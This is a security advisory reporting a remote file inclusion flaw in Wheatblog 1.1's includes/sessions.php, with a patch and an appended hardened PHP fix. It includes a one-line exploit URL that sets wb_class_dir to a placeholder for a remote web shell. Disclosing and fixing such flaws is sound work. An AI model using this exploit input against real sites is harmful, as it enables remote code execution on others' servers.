Hello,

Wheatblog (wB) Remote File Inclusion


Tested on 1.1; older versions are also affected.


Discovered By : HACKERS PAL

Copyright : HACKERS PAL

Website : http://www.soqor.net

Email Address : [EMAIL PROTECTED]


Remote File Inclusion

file : includes/sessions.php


line 2 :

code:-

include_once("$wb_class_dir/classDatabase.php");


The variable wb_class_dir can be controlled by the requester, so the included file can be loaded from a remote location.


Solution


replace

code :-

include_once("$wb_class_dir/classDatabase.php");


with

code:-

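// Protected By : HACKERS PAL
// [EMAIL PROTECTED]
// Http://WwW.SoQoR.NeT

// Block direct requests to this file and any request that supplies wb_class_dir.
// $_SERVER['PHP_SELF'] replaces $PHP_SELF, stripos() replaces the removed eregi(),
// and $_REQUEST replaces $_GLOBALS, which is not a PHP superglobal.
if (stripos($_SERVER['PHP_SELF'], "sessions.php") !== false || isset($_REQUEST['wb_class_dir']))
{
 die("<h1>Forbidden 403<br> Protected By : HACKERS PAL</h1>");
}
include_once("$wb_class_dir/classDatabase.php");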



Exploit : -

includes/sessions.php?wb_class_dir=[Ev!1-Sh311]?


#WwW.SoQoR.NeT
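A stricter variant of the Solution above, as an added example that is not part of the original advisory and is not Wheatblog's code: the include path comes from a constant and is resolved inside a fixed directory, so no request variable can influence it. The constant name WB_CLASS_DIR, the helper wb_resolve_class_file() and the classes/ directory are assumptions made for illustration.

```php
<?php
// Added example (not Wheatblog's code). WB_CLASS_DIR, wb_resolve_class_file()
// and the directory layout are hypothetical names chosen for illustration.

// Resolve a class file inside a fixed base directory. Returns the absolute
// path, or null if the name or the resolved path is not acceptable.
function wb_resolve_class_file($baseDir, $fileName)
{
    // Accept plain file names only: no slashes, no URL scheme, no "..".
    if (!preg_match('/^[A-Za-z0-9_]+\.php$/', $fileName)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $fileName);
    // realpath() works on the local filesystem only and returns false for
    // missing files and for URLs, so a remote location cannot pass this check.
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// In the entry script (for example index.php), before any include:
//   define('WB_CLASS_DIR', __DIR__ . '/classes');
// Constants cannot be set from GET, POST or cookie data.

// At the top of includes/sessions.php:
if (!defined('WB_CLASS_DIR')) {
    // The file was requested directly, so no trusted entry point ran first.
    header('HTTP/1.1 403 Forbidden');
    exit('Forbidden');
}

$classFile = wb_resolve_class_file(WB_CLASS_DIR, 'classDatabase.php');
if ($classFile === null) {
    exit('Configuration error: classDatabase.php not found');
}
include_once $classFile;
```

Keeping allow_url_include off in php.ini also stops include from fetching URLs at all.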
